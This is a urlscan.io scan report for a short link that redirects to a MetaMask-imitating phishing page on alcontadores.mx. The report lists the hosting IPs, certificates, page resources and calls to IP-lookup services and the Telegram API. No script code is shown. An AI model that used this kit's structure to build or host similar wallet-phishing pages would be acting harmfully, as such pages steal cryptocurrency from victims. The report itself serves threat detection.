alcontadores.mx Open in urlscan Pro
65.99.252.128 Malicious Activity! Public Scan

Go To Rescan
Add Verdict Report

Submitted URL:
http://www.rb.gy/t9m0b5/
Effective URL:
https://alcontadores.mx/Metamassk/metta/MetaMask/app/
Submission: On December 15 via api (December 15th 2023, 4:30:35 pm UTC) from US — Scanned from US

Summary HTTP 22 Redirects Behaviour Indicators

Summary

This website contacted 5 IPs in 2 countries across 6 domains to perform 22 HTTP transactions. The main IP is 65.99.252.128, located in Pittsburgh, United States and belongs to AS17378, US. The main domain is alcontadores.mx.
TLS certificate: Issued by R3 on October 18th 2023. Valid for: 3 months.

This is the only time alcontadores.mx was scanned on urlscan.io!

urlscan.io Verdict: Potentially Malicious

Targeting these brands: Metamask (Crypto)

Domain & IP information

	IP Address	AS Autonomous System
1 1	44.207.55.129 44.207.55.129	14618 (AMAZON-AES) (AMAZON-AES)
18	65.99.252.128 65.99.252.128	17378 (AS17378) (AS17378)
1	2607:f8b0:400... 2607:f8b0:4006:816::200a	15169 (GOOGLE) (GOOGLE)
1	104.237.62.212 104.237.62.212	18450 (WEBNX) (WEBNX)
1	2606:4700:20:... 2606:4700:20::681a:82c	13335 (CLOUDFLAR...) (CLOUDFLARENET)
1	2001:67c:4e8:... 2001:67c:4e8:f004::9	62041 (TELEGRAM) (TELEGRAM)
22	5

1 44.207.55.129 (Ashburn, United States) 1 redirects

ASN14618 (AMAZON-AES, US)
PTR: ec2-44-207-55-129.compute-1.amazonaws.com

www.rb.gy	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

18 65.99.252.128 (Pittsburgh, United States)

ASN17378 (AS17378, US)
PTR: svgs171.serverneubox.com.mx

alcontadores.mx	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2607:f8b0:4006:816::200a (United States)

ASN15169 (GOOGLE, US)

ajax.googleapis.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 104.237.62.212 (El Segundo, United States)

ASN18450 (WEBNX, US)
PTR: api.ipify.org

api.ipify.org	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2606:4700:20::681a:82c (United States)

ASN13335 (CLOUDFLARENET, US)

ipapi.co	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2001:67c:4e8:f004::9 (Amsterdam, Netherlands)

ASN62041 (TELEGRAM, VG)

api.telegram.org	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

	Apex Domain Subdomains	Transfer
18	alcontadores.mx alcontadores.mx	288 KB
1	telegram.org api.telegram.org — Cisco Umbrella Rank: 45319	263 B
1	ipapi.co ipapi.co — Cisco Umbrella Rank: 15570	909 B
1	ipify.org api.ipify.org — Cisco Umbrella Rank: 2843	222 B
1	googleapis.com ajax.googleapis.com — Cisco Umbrella Rank: 340	31 KB
1	rb.gy 1 redirects www.rb.gy	268 B
22	6

	Domain	Requested by
18	alcontadores.mx	alcontadores.mx
1	api.telegram.org	alcontadores.mx
1	ipapi.co	alcontadores.mx
1	api.ipify.org	alcontadores.mx
1	ajax.googleapis.com	alcontadores.mx
1	www.rb.gy	1 redirects
22	6

This site contains no links.

Subject Issuer	Validity	Valid
alcontadores.mx R3	`2023-10-18` - `2024-01-16`	3 months	crt.sh
upload.video.google.com GTS CA 1C3	`2023-11-20` - `2024-02-12`	3 months	crt.sh
*.ipify.org Sectigo RSA Domain Validation Secure Server CA	`2023-02-07` - `2024-02-18`	a year	crt.sh
sni.cloudflaressl.com Cloudflare Inc ECC CA-3	`2023-04-16` - `2024-04-15`	a year	crt.sh
api.telegram.org Go Daddy Secure Certificate Authority - G2	`2023-03-26` - `2024-04-26`	a year	crt.sh

This page contains 1 frames:

Primary Page: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
Frame ID: CAD5AD210A520784A2507A506D02B1CC
Requests: 22 HTTP requests in this frame

Screenshot
Live screenshot

Full Image

Page Title

MetaMask

Page URL History Show full URLs

http://www.rb.gy/t9m0b5/ HTTP 301
https://alcontadores.mx/Metamassk/metta/MetaMask/app/ Page URL

Detected technologies

Bootstrap (Web Frameworks) Expand

Overall confidence: 100%
Detected patterns

bootstrap(?:[^>]*?([0-9a-fA-F]{7,40}|[\d]+(?:.[\d]+(?:.[\d]+)?)?)|)[^>]*?(?:\.min)?\.js

jQuery (JavaScript Libraries) Expand

Overall confidence: 100%
Detected patterns

/([\d.]+)/jquery(?:\.min)?\.js
jquery.*\.js(?:\?ver(?:sion)?=([\d.]+))?

Page Statistics

22
Requests

100 %
HTTPS

50 %
IPv6

6
Domains

6
Subdomains

5
IPs

2
Countries

320 kB
Transfer

375 kB
Size

0
Cookies

0 Outgoing links

These are links going to different origins than the main page.

Page URL History

This captures the URL locations of the websites, including HTTP redirects and client-side redirects via JavaScript or Meta fields.

http://www.rb.gy/t9m0b5/ HTTP 301
https://alcontadores.mx/Metamassk/metta/MetaMask/app/ Page URL

Redirected requests

There were HTTP redirect chains for the following requests:

22 HTTP transactions
0 data transactions

Method
Protocol Status Resource
Path Size
x-fer Time
Latency Type
MIME-Type IP
Location

GET
H2

200

Primary Request / Show response
alcontadores.mx/Metamassk/metta/MetaMask/app/
Redirect Chain

http://www.rb.gy/t9m0b5/
https://alcontadores.mx/Metamassk/metta/MetaMask/app/

13 KB
14 KB

347ms
124ms

Document
text/html

65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache / PHP/7.4.33

Resource Hash

0266be648c35fc4787752abda921c49dda0dbab7ca5645daf32d869e416f9300

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36
accept-language: en-US,en;q=0.9

Response headers

content-type: text/html; charset=UTF-8
date: Fri, 15 Dec 2023 16:30:30 GMT
referrer-policy: no-referrer-when-downgrade
server: Apache
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-powered-by: PHP/7.4.33
x-xss-protection: 1

Redirect headers

Cache-Control: no-cache, no-store
Connection: keep-alive
Content-Length: 0
Date: Fri, 15 Dec 2023 16:30:30 GMT
Engine: Rebrandly.redirect, version 2.1
Expires: -1
Location: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

GET
H2 200 style.css
alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/ 8 KB
8 KB 66ms
65ms Stylesheet
text/css 65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/style.css

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache /

Resource Hash

3213dcf52247c90f252a9adc644a128d58caf6e0a6e19186ed7da5ff34772900

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
date: Fri, 15 Dec 2023 16:30:30 GMT
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade
last-modified: Fri, 12 May 2023 07:47:40 GMT
server: Apache
x-frame-options: SAMEORIGIN
content-type: text/css
accept-ranges: bytes
content-length: 7837
x-xss-protection: 1

GET
H2 200 jquery.min.js Show response
ajax.googleapis.com/ajax/libs/jquery/3.5.1/ 87 KB
31 KB 203ms
66ms Script
text/javascript 2607:f8b0:4006:816::200a
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2607:f8b0:4006:816::200a , United States, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

f7f6a5894f1d19ddad6fa392b2ece2c5e578cbf7da4ea805b6885eb6985b6e3d

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

date: Fri, 15 Dec 2023 15:20:28 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 4202
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/hosted-libraries-pushers
cross-origin-resource-policy: cross-origin
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length: 31021
x-xss-protection: 0
last-modified: Fri, 08 May 2020 07:05:03 GMT
server: sffe
cross-origin-opener-policy: same-origin; report-to="hosted-libraries-pushers"
vary: Accept-Encoding
report-to: {"group":"hosted-libraries-pushers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers"}]}
content-type: text/javascript; charset=UTF-8
access-control-allow-origin: *
cache-control: public, max-age=31536000, stale-while-revalidate=2592000
accept-ranges: bytes
timing-allow-origin: *
expires: Sat, 14 Dec 2024 15:20:28 GMT

GET
H2 200 jquery.js Show response
alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/ 82 KB
82 KB 66ms
65ms Script
application/javascript 65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/jquery.js

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache /

Resource Hash

75f9c7a8b62b23b9d0519807c98f3805fcce274ea73dc85e9b6058633bbe5dd1

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
date: Fri, 15 Dec 2023 16:30:30 GMT
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade
last-modified: Fri, 12 May 2023 07:45:40 GMT
server: Apache
x-frame-options: SAMEORIGIN
content-type: application/javascript
accept-ranges: bytes
content-length: 84253
x-xss-protection: 1

GET
H2 200 wordlist.js Show response
alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/ 23 KB
23 KB 70ms
70ms Script
application/javascript 65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/wordlist.js

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache /

Resource Hash

8b9e67a9204c49cadfdbab5977d2fc4e4fa205d0964d3af57542f4b29aaf091a

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
date: Fri, 15 Dec 2023 16:30:30 GMT
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade
last-modified: Fri, 12 May 2023 07:45:40 GMT
server: Apache
x-frame-options: SAMEORIGIN
content-type: application/javascript
accept-ranges: bytes
content-length: 23380
x-xss-protection: 1

GET
H2 200 app.js Show response
alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/ 11 KB
11 KB 68ms
67ms Script
application/javascript 65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/app.js

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache /

Resource Hash

cfe967e9a2dba0ca7f01c8856bfb7011e14d7082535d16a9d10d6cc765f254b0

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
date: Fri, 15 Dec 2023 16:30:30 GMT
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade
last-modified: Sun, 01 Oct 2023 18:26:40 GMT
server: Apache
x-frame-options: SAMEORIGIN
content-type: application/javascript
accept-ranges: bytes
content-length: 11251
x-xss-protection: 1

GET
H2 200 metamask-fox.svg
alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/ 3 KB
3 KB 67ms
66ms Image
image/svg+xml 65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/metamask-fox.svg

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache /

Resource Hash

b855851451c3eb7220bc7331d6cf7f19dad4580ebc35610211f028848ba7fc34

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
date: Fri, 15 Dec 2023 16:30:30 GMT
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade
last-modified: Fri, 12 May 2023 07:45:40 GMT
server: Apache
x-frame-options: SAMEORIGIN
content-type: image/svg+xml
accept-ranges: bytes
content-length: 3231
x-xss-protection: 1

GET
H2 200 arrow-down.svg
alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/ 237 B
307 B 66ms
65ms Image
image/svg+xml 65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/arrow-down.svg

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache /

Resource Hash

abe57183266b029cd4ce1930f075bfd65390348a7c3d2a869af4ee0abf0941ca

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
date: Fri, 15 Dec 2023 16:30:30 GMT
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade
last-modified: Fri, 12 May 2023 07:45:40 GMT
server: Apache
x-frame-options: SAMEORIGIN
content-type: image/svg+xml
accept-ranges: bytes
content-length: 237
x-xss-protection: 1

GET
H2 200 copy.svg
alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/ 348 B
383 B 65ms
65ms Image
image/svg+xml 65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/copy.svg

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache /

Resource Hash

592d24544f32f46667cc962881544e7f505e203e4913a9393d37b1c724ab5659

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
date: Fri, 15 Dec 2023 16:30:30 GMT
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade
last-modified: Fri, 12 May 2023 07:45:40 GMT
server: Apache
x-frame-options: SAMEORIGIN
content-type: image/svg+xml
accept-ranges: bytes
content-length: 348
x-xss-protection: 1

GET
H2 200 more-vertical.svg
alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/ 497 B
532 B 66ms
65ms Image
image/svg+xml 65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/more-vertical.svg

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache /

Resource Hash

5799c35105be07d1faff594cd3c7cbf13ddc0d7e9b0e99a7fcb76ac207cbb420

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
date: Fri, 15 Dec 2023 16:30:30 GMT
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade
last-modified: Fri, 12 May 2023 07:45:40 GMT
server: Apache
x-frame-options: SAMEORIGIN
content-type: image/svg+xml
accept-ranges: bytes
content-length: 497
x-xss-protection: 1

GET
H2 200 eth_logo.svg
alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/ 919 B
954 B 66ms
64ms Image
image/svg+xml 65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/eth_logo.svg

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache /

Resource Hash

5cd740de2fa35767446eab37428c28eadeb35a105948e3e2cfcb8a4d01296200

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
date: Fri, 15 Dec 2023 16:30:30 GMT
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade
last-modified: Fri, 12 May 2023 07:45:40 GMT
server: Apache
x-frame-options: SAMEORIGIN
content-type: image/svg+xml
accept-ranges: bytes
content-length: 919
x-xss-protection: 1

GET
H2 200 diagram.svg
alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/ 484 B
519 B 69ms
68ms Image
image/svg+xml 65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/diagram.svg

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache /

Resource Hash

11ae8d74c3da527bb66ff1822847b97d4a165e3b82e1a1408ec196b93ffabaac

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
date: Fri, 15 Dec 2023 16:30:30 GMT
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade
last-modified: Fri, 12 May 2023 07:45:40 GMT
server: Apache
x-frame-options: SAMEORIGIN
content-type: image/svg+xml
accept-ranges: bytes
content-length: 484
x-xss-protection: 1

GET
H2 200 arrow-right.svg
alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/ 264 B
299 B 69ms
69ms Image
image/svg+xml 65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/arrow-right.svg

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache /

Resource Hash

115d5ad774f38ca49e06be632929e1d2f36dbb7c4ac875e7375fb42322de1022

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
date: Fri, 15 Dec 2023 16:30:30 GMT
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade
last-modified: Fri, 12 May 2023 07:45:40 GMT
server: Apache
x-frame-options: SAMEORIGIN
content-type: image/svg+xml
accept-ranges: bytes
content-length: 264
x-xss-protection: 1

GET
H2 200 recive.svg
alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/ 993 B
1 KB 70ms
69ms Image
image/svg+xml 65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/recive.svg

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache /

Resource Hash

d17ffd37a4535ecee634848d22204de8e7f5ed39a462a077bd6506bf7c1fa8f6

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
date: Fri, 15 Dec 2023 16:30:30 GMT
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade
last-modified: Fri, 12 May 2023 07:45:40 GMT
server: Apache
x-frame-options: SAMEORIGIN
content-type: image/svg+xml
accept-ranges: bytes
content-length: 993
x-xss-protection: 1

GET
H2 200 settings.js Show response
alcontadores.mx/Metamassk/metta/MetaMask/ 129 B
203 B 66ms
65ms Script
application/javascript 65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/settings.js

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache /

Resource Hash

b9120cfb78e7b6c6a6703376f9ce4657cc477e303be23db671344c0e020e26ab

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
date: Fri, 15 Dec 2023 16:30:30 GMT
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade
last-modified: Thu, 14 Dec 2023 22:04:02 GMT
server: Apache
x-frame-options: SAMEORIGIN
content-type: application/javascript
accept-ranges: bytes
content-length: 129
x-xss-protection: 1

GET
H2 200 bootstrap.min.js Show response
alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/ 18 KB
18 KB 66ms
66ms Script
application/javascript 65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/bootstrap.min.js

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache /

Resource Hash

e997a913e528255e99ac10b1159d69768ae82abd30c651ad1bfbf51c2b4665c1

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
date: Fri, 15 Dec 2023 16:30:30 GMT
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade
last-modified: Mon, 02 Oct 2023 00:22:04 GMT
server: Apache
x-frame-options: SAMEORIGIN
content-type: application/javascript
accept-ranges: bytes
content-length: 18381
x-xss-protection: 1

GET
H2 200 style.main.js Show response
alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/ 10 KB
10 KB 66ms
65ms Script
application/javascript 65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/style.main.js

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

